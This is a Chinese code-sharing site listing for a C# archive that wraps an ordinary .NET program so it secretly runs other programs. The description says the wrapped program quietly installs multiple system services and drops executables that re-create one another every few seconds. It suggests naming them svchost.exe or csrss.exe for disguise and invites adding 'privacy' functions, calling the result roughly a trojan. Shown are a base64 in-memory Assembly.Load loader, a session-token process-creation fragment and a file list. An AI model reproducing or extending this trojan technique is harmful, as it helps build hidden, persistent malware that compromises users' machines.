• 大小: 0.61M
    文件类型: .rar
    金币: 1
    下载: 0 次
    发布日期: 2020-12-14
  • 语言: C#
  • 标签: 内存  C#  c    

资源简介

此程序仅做参考之用,不要运行里面的exe,否则后果自负。先看里面的说明。
此程序只使用C#编写,功能是将一个正常的程序添加上其他操作。
将一些程序生成字符串,在一个程序里运行,差不多就是在内存里运行程序,
static void Main()
        {
            string str_Normal = Code_Resource.str_Normal; //取得exe文件生成的base64串
            byte[] ns = Convert.FromBase64String(str_Normal); //生成byte[]
            Assembly asm_n = Assembly.Load(ns); //运行byte[]
            MethodInfo info_n = asm_n.EntryPoint;
            ParameterInfo[] parameters_n = info_n.GetParameters();
            info_n.Invoke(null, null);
        }
这个程序需要执行的代码都在 资源文件 里面。
运行Replica_Prg这个里面的,看到的是Normal_Soft的效果,同时背地里建立多个系统服务、释放多个exe、exe和系统服务相互释放。
因为只使用C#编写,所以只能对.net编写的exe进行转码运行。
可以包装一个常用的.net的exe文件,在里面添加执行其他的.net的exe,差不多就是木马。
此程序只是编译过了,并没有实际运行。
因为要删除这个程序太恶心了,隔几十秒就检测释放,多个系统服务和exe交互释放。
为了便于删除,没检测判断每个服务是否被停掉,重启。
为了便于删除,生成的都在c:\temp里面,生成的可以起个好听的名字,比如svchost.exe、csrss.exe什么的。
有的程序可能忘了添加修改app.manifest(就是管理员模式运行),自行修改,
功能没写,需要执行什么隐私功能自行添加,
有些可能忘写判断了,用try{}没报错,自己添加。
此程序只是编译过了,并没有实际运行检测,可能有些逻辑环节没执行到,或转码重复或有误,自行修正。
程序只是说明性质的,如有兴趣自己去运行、修改。

资源截图

代码片段和文件信息

using System;
using System.Runtime.InteropServices;
using System.Security.Principal;

namespace ConsoleWithWindowsService
{
    class Interop
    {
        public static void CreateProcess(string app string path)
        {
            bool result;
            IntPtr hToken = WindowsIdentity.GetCurrent().Token;
            IntPtr hDupedToken = IntPtr.Zero;

            PROCESS_INFORMATION pi = new PROCESS_INFORMATION();
            SECURITY_ATTRIBUTES sa = new SECURITY_ATTRIBUTES();
            sa.Length = Marshal.SizeOf(sa);

            STARTUPINFO si = new STARTUPINFO();
            si.cb = Marshal.SizeOf(si);

            int dwSessionID = WTSGetActiveConsoleSessionId();
            result = WTSQueryUserToken(dwSessionID out hToken);

            if (!result)

 属性            大小     日期    时间   名称
----------- ---------  ---------- -----  ----

    ..A..H.     41984  2017-10-01 00:54  Run_1\.vs\Run_1\v14\.suo

     文件        189  2017-09-30 23:30  Run_1\App.config

     文件      26112  2017-10-01 00:52  Run_1\bin\Debug\Run_1.exe

     文件        189  2017-09-30 23:30  Run_1\bin\Debug\Run_1.exe.config

     文件      17920  2017-10-01 00:52  Run_1\bin\Debug\Run_1.pdb

     文件      22696  2017-10-01 00:54  Run_1\bin\Debug\Run_1.vshost.exe

     文件        189  2017-09-30 23:30  Run_1\bin\Debug\Run_1.vshost.exe.config

     文件        490  2017-03-19 05:00  Run_1\bin\Debug\Run_1.vshost.exe.manifest

     文件         42  2017-10-01 00:54  Run_1\obj\Debug\Run_1.csproj.FileListAbsolute.txt

     文件        957  2017-09-30 23:40  Run_1\Program.cs

     文件       1318  2017-09-30 23:30  Run_1\Properties\AssemblyInfo.cs

     文件       2823  2017-09-30 23:30  Run_1\Properties\Resources.Designer.cs

     文件       5612  2017-09-30 23:30  Run_1\Properties\Resources.resx

     文件       1092  2017-09-30 23:30  Run_1\Properties\Settings.Designer.cs

     文件        249  2017-09-30 23:30  Run_1\Properties\Settings.settings

     文件       4002  2017-09-30 23:35  Run_1\Run_1.csproj

     文件        976  2017-09-30 23:30  Run_1\Run_1.sln

     文件       3696  2017-09-30 23:35  Run_1\Service_Resource.Designer.cs

     文件      24331  2017-09-30 23:35  Run_1\Service_Resource.resx

    ..A..H.     40960  2017-10-01 00:56  Run_app\.vs\Run_app\v14\.suo

     文件        189  2017-09-30 20:18  Run_app\App.config

     文件      10240  2017-09-30 21:44  Run_app\bin\Debug\Run_app.exe

     文件        189  2017-09-30 20:18  Run_app\bin\Debug\Run_app.exe.config

     文件      15872  2017-09-30 21:44  Run_app\bin\Debug\Run_app.pdb

     文件      22696  2017-10-01 00:54  Run_app\bin\Debug\Run_app.vshost.exe

     文件        189  2017-09-30 20:18  Run_app\bin\Debug\Run_app.vshost.exe.config

     文件       3335  2017-09-30 20:20  Run_app\bin\Debug\Run_app.vshost.exe.manifest

     文件         46  2017-10-01 00:54  Run_app\obj\Debug\Run_app.csproj.FileListAbsolute.txt

     文件       1559  2017-09-30 21:43  Run_app\Program.cs

     文件       3335  2017-09-30 20:20  Run_app\Properties\app.manifest

............此处省略191个文件信息

评论

共有 条评论